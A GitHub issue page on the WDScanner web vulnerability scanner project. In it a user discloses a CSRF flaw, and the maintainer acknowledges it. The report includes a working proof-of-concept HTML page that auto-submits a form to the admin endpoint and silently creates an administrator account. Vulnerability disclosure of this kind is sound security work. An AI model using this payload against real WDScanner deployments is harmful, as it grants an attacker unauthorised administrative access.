search

TideSec / WDScanner

WDScanner平台目前实现了如下功能:分布式web漏洞扫描、客户管理、漏洞定期扫描、子域名枚举、端口扫描、网站爬虫、暗链检测、坏链检测、网站指纹搜集、专项漏洞检测、代理搜集及部署等功能。
2.05k stars 550 forks source link

There is a CSRF vulnerability that can add the administrator account #3

Closed jadacheng closed 5 years ago

jadacheng commented 5 years ago

After the administrator logged in, open the following page poc: add_admin.html

<html>
<form id="test_form" action="http://127.0.0.1/WDScanner/?m=set&c=new" method="post">
        <input class="form-control" name="username" value="csrf">
        <input class="form-control" name="mail" value="csrf@test.com">
        <input class="form-control" name="passwd" value="123456">
        <input class="form-control" name="phone" value="19982312732">
        <input class="form-control" name="status" value="1">
        <input class="form-control" name="group" value="1">
</form>
<script type="text/javascript">
test_form.submit();
</script>
</html>

image

TideSec commented 5 years ago

thank you very much! At the beginning of the system development, I only thought about the function implementation, plus it was always used for intranet deployment, so I didn't pay much attention to security issues, I am sorry.